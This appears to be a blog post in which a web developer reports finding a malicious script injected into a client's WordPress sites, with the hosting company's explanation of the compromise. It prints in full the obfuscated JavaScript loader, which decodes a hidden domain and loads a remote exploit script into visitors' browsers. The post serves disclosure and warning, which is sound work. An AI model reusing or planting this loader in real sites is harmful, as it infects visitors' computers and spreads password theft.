I received an email from someone this morning asking me to correct a problem on their WordPress site. This in of itself is not unusual, but what I found when I went to their site was unusual. In fact, it was cause for alarm.
The design issue was easy enough to fix, but I received warning messages from Google Chrome when entering their website and Avast was popping up warnings telling me it was blocking a malicious script. I thought to myself, “That’s odd, it shouldn’t be doing that.” I looked at another WordPress website on his server and got the same warnings.
I looked at the source code for the homepage of each WordPress website and couldn’t help but notice a fat little script injected at the bottom of the page right before the closing body tag. The code read as follows:
<script>function NeqatiqavWevpp (ZilitepicaWmufed) { var PisudwodVayora = document.cookie.indexOf (';', ZilitepicaWmufed); if (PisudwodVayora == -1) PisudwodVayora = document.cookie.length; return unescape(document.cookie.substring(ZilitepicaWmufed, PisudwodVayora)); } function KfyoFegih (name) { var arg = name + '='; var alen = arg.length; var clen = document.cookie.length; var i = 0; while (i < clen) { var j = i + alen; if (document.cookie.substring(i, j) == arg) return NeqatiqavWevpp (j); i = document.cookie.indexOf(' ', i) + 1; if (i == 0) break; } return null; } function FeyedoQgof (name, value) { var argv = FeyedoQgof.arguments; var argc = FeyedoQgof.arguments.length; var expires = (argc > 2) ? argv[2] : null; var path = (argc > 3) ? argv[3] : null; var domain = (argc > 4) ? argv[4] : null; var secure = (argc > 5) ? argv[5] : false; document.cookie = name + '=' + escape (value) + ((expires == null) ? '' : ('; expires=' + expires.toGMTString())) + ((path == null) ? '' : ('; path=' + path)) + ((domain == null) ? '' : ('; domain=' + domain)) + ((secure == true) ? '; secure' : ''); } if (KfyoFegih('o') == null) { var KipidBaqetogaf = 'FJVDLCZWJiCUOKnRWDFXRsACNLWIZDStOVOWFGFaBLOUIlAJRYEINEQAlYWKU-YFKOSDILMaGYCAACYdOZPSoYDGSLXbKYTOQDBLUTeFXGPH-XYYOIEQNEfBSFBlTHVOBIUNJaNYYQYAUNDsNXTZJVJIhTXNJ.XXCJIDLPMcUUPOXQHQZoOSLm'.replace(/[A-Z]/g,''); var PiqoczuDerrqar = document.createElement('script'); PiqoczuDerrqar.src = 'http://' + KipidBaqetogaf + '/counter/?page=' + escape(document.referrer) + '&rnd=' + Math.random() + '&fromsrv=1'; document.getElementsByTagName('head')[0].appendChild(PiqoczuDerrqar); var GakileyiqDokodizu = new Date (); GakileyiqDokodizu.setTime(GakileyiqDokodizu.getTime() + (8*3600*1000)); FeyedoQgof('o','1',GakileyiqDokodizu, '/'); }</script>
I called the person who emailed me to inform him of this hack and he told me that he received an email earlier this morning notifying him that many WordPress files had been changed (he uses the WordPress File Monitor plugin). In the email, it said the following files had been changed:
wp-login.php wp-app.php wp-links-opml.php wp-settings.php testrssfeed.php readme.html wp-admin/install.php wp-admin/admin-footer.php wp-admin/sidebar.php wp-admin/press-this.php wp-admin/upgrade.php wp-admin/setup-config.php wp-admin/import/blogware.php wp-admin/import/livejournal.php wp-admin/maint/repair.php wp-admin/includes/media.php wp-admin/includes/template.php wp-includes/functions.php wp-includes/js/codepress/codepress.html wp-includes/js/tinymce/wp-mce-help.php wp-includes/js/tinymce/blank.htm wp-includes/js/tinymce/plugins/media/media.htm wp-includes/js/tinymce/plugins/inlinepopups/template.htm wp-includes/js/tinymce/plugins/wpeditimage/editimage.html wp-includes/js/tinymce/plugins/paste/blank.htm wp-includes/js/tinymce/plugins/paste/pastetext.htm wp-includes/js/tinymce/plugins/paste/pasteword.htm wp-includes/js/tinymce/plugins/fullscreen/fullscreen.htm wp-includes/js/tinymce/themes/advanced/link.htm wp-includes/js/tinymce/themes/advanced/source_editor.htm wp-includes/js/tinymce/themes/advanced/anchor.htm wp-includes/js/tinymce/themes/advanced/color_picker.htm wp-includes/js/tinymce/themes/advanced/charmap.htm wp-includes/js/tinymce/themes/advanced/about.htm wp-includes/js/tinymce/themes/advanced/image.htm wp-content/plugins/wp-pagenavi/readme.html wp-content/plugins/membership-subscription-management/byrd_rolessubscription s/database/index.html wp-content/plugins/membership-subscription-management/byrd_rolessubscription s/database/database/index.html wp-content/plugins/role-scoper/RoleScoper_UsageGuide.htm wp-content/plugins/search-unleashed/engines/Zend/Search/Lucene/Search/Query. php wp-content/plugins/search-unleashed/engines/Zend/Search/Lucene/Document/Html .php wp-content/plugins/featured-category/featcat_admin.php wp-content/uploads/2010/01/Author-posts.html wp-content/themes/classic/comments-popup.php wp-content/themes/classic/footer.php wp-content/themes/mpdailyfix/comments-popup.php wp-content/themes/mpdailyfix/footer.php wp-content/themes/default/comments-popup.php wp-content/themes/default/footer.php
As of right now we’re looking into restoring the sites back to their original state. And changing all logins and passwords as I’m not sure what this script has done or what it has gained access to.
I should also note that many of the sites infected are running the current version of WordPress (2.9.1) and I didn’t find any references to this script on Google. It’s entirely possible that this is a new WordPress hack.
If you find your WordPress site(s) suddenly pop up with warnings when you go to them, check your source code and look for anything out of the ordinary. Or have someone else look into it for you. And using the WordPress File Monitor plugin is a great idea for security purposes. If you don’t currently use a file monitoring program, then I recommend you check into this one.
Update: Maybe this is not a “new” WordPress hack, but it is the result of a malicious PHP file. The hosting company which manages the server employed in this attack responded with the following:
In reviewing the server’s configuration it was discovered that “Allow FTP logins to all accounts using the root password” was enabled in the server’s WHM configuration.
The attacker appears to have compromised the server’s root password. The root password has been changed.
All accounts were affected by a malicious script insertion attack. An attacker was able to upload a malicious PHP file via FTP. This file was then executed and used to insert the malicious script into each site on the server.
The “Allow FTP logins to all accounts using the root password” setting has been disabled and the removal of the script from all accounts on the server has been completed.
What the script does:
This script executes a malicious javascript package hosted on a remote server in the context of the user’s browser. This script is designed to run browser exploits against outdated web browsers with known vulnerabilities. Thus anyone who visited any of the infected sites with an out of date browser, may have had malware/viruses installed on their local computer. Once a local computer is compromised, the malware will begin searching the local computer’s hard drive for saved passwords so that it can repeat the process by uploading itself to other FTP accounts.
This is type of attack has, unfortunately, become quite common. For a more detailed explanation of how this type of malware works please see: http://www.viruslist.com/en/weblog?weblogid=208187897
You are recommended to run anit-virus and spy-ware detection software on your local computer.
No related posts.